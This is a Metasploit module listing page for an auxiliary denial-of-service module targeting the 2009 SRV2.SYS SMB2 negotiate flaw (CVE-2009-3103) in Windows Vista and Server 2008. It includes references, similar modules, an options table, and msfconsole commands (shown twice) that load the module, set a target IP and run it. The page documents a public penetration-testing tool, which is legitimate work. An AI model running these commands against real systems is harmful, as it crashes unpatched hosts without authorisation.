Browse Exploit & Auxiliary Modules
The Metasploit Project hosts the world's largest database of quality assured exploits, including hundreds of remote exploits, auxiliary modules, and payloads. You can even review the Metasploit Framework source code of any module - or write your own.
Search for modules
Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw.
Rank
- Normal
Authors
- Laurent Gaffie < laurent.gaffie [at] gmail.com >
- hdm < hdm [at] metasploit.com >
References
- CVE-2009-3103
- BID-36299
- OSVDB-57799
- MSB-MS09-050
- http://seclists.org/fulldisclosure/2009/Sep/0039.html
- http://www.microsoft.com/technet/security/advisory/975497.mspx
Development
Similar Modules
- auxiliary/dos/windows/smb/ms05_047_pnp
- auxiliary/dos/windows/smb/ms06_035_mailslot
- auxiliary/dos/windows/smb/ms06_063_trans
- auxiliary/dos/windows/smb/ms09_001_write
- auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff
- auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
- auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow
- auxiliary/dos/windows/smb/ms11_019_electbowser
- auxiliary/dos/windows/smb/rras_vls_null_deref
- auxiliary/dos/windows/smb/vista_negotiate_stop
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh
msf auxiliary(ms09_050_smb2_negotiate_pidhigh) > set RHOST [TARGET IP]
msf auxiliary(ms09_050_smb2_negotiate_pidhigh) > run
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh
msf auxiliary(ms09_050_smb2_negotiate_pidhigh) > set RHOST [TARGET IP]
msf auxiliary(ms09_050_smb2_negotiate_pidhigh) > run
Module Options
| OFFSET | The function table offset to call (default: 65535) |
| RHOST | The target address |
| RPORT | The target port (default: 445) |
| CHOST | The local client address |
| CPORT | The local client port |
| ConnectTimeout | Maximum number of seconds to establish a TCP connection |
| Proxies | Use a proxy chain |
| SSL | Negotiate SSL for outgoing connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| TCP::max_send_size | Maxiumum tcp segment size. (0 = disable) |
| TCP::send_delay | Delays inserted before every send. (0 = disable) |